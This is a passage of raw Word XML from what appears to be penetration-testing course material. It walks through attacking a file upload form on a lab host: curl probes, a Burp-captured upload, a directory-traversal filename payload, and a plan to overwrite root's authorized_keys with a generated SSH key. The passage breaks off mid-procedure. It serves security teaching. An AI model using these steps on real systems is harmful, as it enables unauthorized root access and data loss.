          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404 page not found</w:t>
      </w:r>
    </w:p>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t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com:8000/meteor/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404 page not found</w:t>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t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com:8000/admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404 page not found</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 37 - Failed attempts to access PHP files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 37 shows that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files no longer exist in the web application. We can safely assume that the web server is no longer using PHP. Let's try to upload a text file. We'll start Burp to capture the requests and use the form on the web application to upload the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file from the previous section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5619750" cy="1438275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 19: Text file successfully uploaded" id="56" name="image44.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 19: Text file successfully uploaded" id="0" name="image44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5619750" cy="1438275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 19: Text file successfully uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D11">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 19 shows that the file was successfully uploaded according to the web application's output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D12">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When testing a file upload form, we should always determine what happens when a file is uploaded twice. If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server. Alternatively, if the web application displays an error message, this may provide valuable information such as the programming language or web technologies in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D13">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's review the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload request in Burp. We'll select the POST request in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, send it to Repeater, and click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 20: POST request for the file upload of test.txt in Burp" id="281" name="image272.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 20: POST request for the file upload of test.txt in Burp" id="0" name="image272.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId277"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2336800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 20: POST request for the file upload of test.txt in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D15">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 20 shows we receive the same output as we did in the browser, without any new or valuable information. Next, let's check if the web application allows us to specify a relative path in the filename and write a file via Directory Traversal outside of the web root. We can do this by modifying the "filename" parameter in the request, so it contains </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../test.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2400300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 21: Relative path in filename to upload file outside of web root" id="436" name="image434.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 21: Relative path in filename to upload file outside of web root" id="0" name="image434.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId278"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2400300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 21: Relative path in filename to upload file outside of web root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D17">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> area shows us that the output includes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sequences. Unfortunately, we have no way of knowing if the relative path was used for placing the file. It's possible that the web application's response merely echoed our filename and sanitized it internally. For now, let's assume the relative path was used for placing the file, since we cannot find any other attack vector. If our assumption is correct, we can try to blindly overwrite files, which may lead us to system access. We should be aware, that blindly overwriting files in a real-life penetration test could result in lost data or costly downtime of a production system. Before moving forward, let's briefly review web server accounts and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D18">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nginx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or other dedicated web servers often run with specific users, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Linux. Traditionally on Windows, the IIS web server runs as a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, a passwordless built-in Windows identity with low privileges. Starting with IIS version 7.5, Microsoft introduced the</w:t>
      </w:r>
      <w:hyperlink r:id="rId279">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId280">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">IIS Application Pool Identities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These are virtual accounts running web applications grouped by</w:t>
      </w:r>
      <w:hyperlink r:id="rId281">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId282">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">application pools</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each application pool has its own pool identity, making it possible to set more precise permissions for accounts running web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D19">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When using programming languages that include their own web server, administrators and developers often deploy the web application without any privilege structures by running applications as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid any permissions issues. This means we should always verify whether we can leverage root or administrator privileges in a file upload vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try to overwrite the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the home directory for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If this file contains the public key of a private key we control, we can access the system via SSH as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. To do this, we'll create an SSH keypair with</w:t>
      </w:r>
      <w:hyperlink r:id="rId283">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId284">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ssh-keygen</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as well as a file with the name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing the previously created public key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A better demonstration of how to inject our new public key into authorized_keys can be seen in the "SSH public key injection attack via authorized_keys file" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating public/private rsa key pair.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter passphrase (empty for no passphrase): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter same passphrase again: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your identification has been saved in fileup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your public key has been saved in fileup.pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ cat fileup.pub &gt; authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
